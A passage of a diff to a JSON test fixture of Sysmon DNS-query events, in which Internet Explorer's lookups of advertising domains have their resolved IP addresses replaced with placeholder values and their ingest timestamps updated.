Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12689,27 +12553,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -12725,16 +12589,13 @@ "trc.taboola.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313903632Z", + "ingested": "2021-12-09T13:49:44.739709300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12793,12 +12654,12 @@ }, "answers": [ { - "data": "107.178.254.65", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "network": { 
@@ -12813,13 +12674,13 @@ "pippio.com" ], "ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313905052Z", + "ingested": "2021-12-09T13:49:44.739715200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12883,11 +12744,11 @@ "type": "CNAME" }, { - "data": "209.15.36.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12895,7 +12756,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12903,7 +12764,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12911,7 +12772,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -12919,21 +12780,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -12949,22 +12810,22 @@ "pixel-sync.sitescout.com" ], "ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313906679Z", + "ingested": "2021-12-09T13:49:44.739721200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -13024,11 +12885,11 @@ }, "answers": [ { - "data": "35.186.202.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13036,7 +12897,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13044,7 +12905,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -13052,7 +12913,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -13060,7 +12921,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -13069,16 +12930,16 @@ } ], "resolved_ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -13094,23 +12955,23 @@ "prod.y-medialink.com" ], "ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313908042Z", + "ingested": "2021-12-09T13:49:44.739727100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13174,37 +13035,37 @@ "type": "CNAME" }, { - "data": "54.80.117.178", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.217.22.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.215.15", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.54.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.204.186.237", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.46.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -13220,18 +13081,13 @@ "jadserve.postrelease.com" ], "ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313909255Z", + "ingested": "2021-12-09T13:49:44.739732900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", 
@@ -13295,39 +13151,39 @@ "type": "CNAME" }, { - "data": "107.21.43.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.220.86", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.172.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.209.65.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.51.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.193.211.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.47.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.151.246", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13336,15 +13192,15 @@ } ], "resolved_ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, 
@@ -13361,22 +13217,15 @@ "appnexus-partners.tremorhub.com" ], "ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313910472Z", + "ingested": "2021-12-09T13:49:44.739738700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData 